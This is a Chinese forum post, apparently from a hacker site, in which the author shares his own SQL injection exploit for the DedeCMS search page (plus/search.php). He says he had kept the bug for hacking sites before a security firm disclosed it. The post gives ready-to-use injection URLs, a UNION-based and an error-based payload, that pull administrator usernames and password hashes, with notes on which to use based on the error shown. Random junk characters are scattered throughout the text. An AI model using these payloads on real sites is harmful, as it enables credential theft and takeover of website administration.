转载不加作者名的没JJ7 M) W* U7 Y4 a
4 D5 h4 ` o0 L k8 w; b哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。6 _, v% g# ~% x, N/ I
3 ^- M; m3 D! C4 U- E8 w既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% ^. }9 `7 g1 \8 d, Y
* z K. R) h$ d- U' e; O我一般是这样测试的:
. i% C* {' \9 t( E9 Q" O
( r- V8 A! u' J. G9 W8 N. n提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a( f. i; ]( w) i( F! f, J
N0 q8 ~) F0 L+ B转载不加作者名的没JJ7 |5 o# R, H. U) \/ G* G8 ~' S
% w% D4 s# z6 V2 a& h
作者:鬼哥% j# D5 a# R1 j0 ]
7 @5 x8 S& J9 D( V- L
1 `# ?" s4 ~ ]4 A n" J
, a* i9 ?( k( s3 i( ?2 V W) o看结果如果提示6 R9 b5 W* H8 H1 F9 b8 }1 p4 u, @- G
) n0 \+ {0 P, s8 R" ?; x- f. B
Safe Alert: Request Error step 2 !
3 i; Q5 N, w4 C, ]* n, ], u! u2 T" Y1 E! G4 `" n4 l
那么直接用下面的exp
7 @0 a0 a5 j" i" P, S% M
% Y3 A& c+ L2 r5 G1 z8 `xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a& |& A Y) f9 _8 o$ E2 z3 }
( ]/ S. A5 n. E" f0 i& e6 F
- z! [4 B7 X" V
看结果如果提示
4 J5 O, O; P) t; W+ H7 z
4 C9 i3 r4 O( t# u2 ?Safe Alert: Request Error step 1 !7 _6 Y T0 j. n* f
/ I: m! ?7 P" \9 L
那么直接用下面的exp
" a* L Z b4 X! `* g# w' f/ o; P5 S* J8 l! K- {' h
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a6 V ~+ @: k- [# p5 ~: }8 k" C! O
4 V4 ^4 v5 G" W1 g
& R& N8 S9 n8 f: H) Z/ Q2 s如果正常显示证明漏洞不存在了。3 _% S: [2 o% ^7 s1 C6 X
! j$ m! b" `1 C9 g转载不加作者名的没JJ |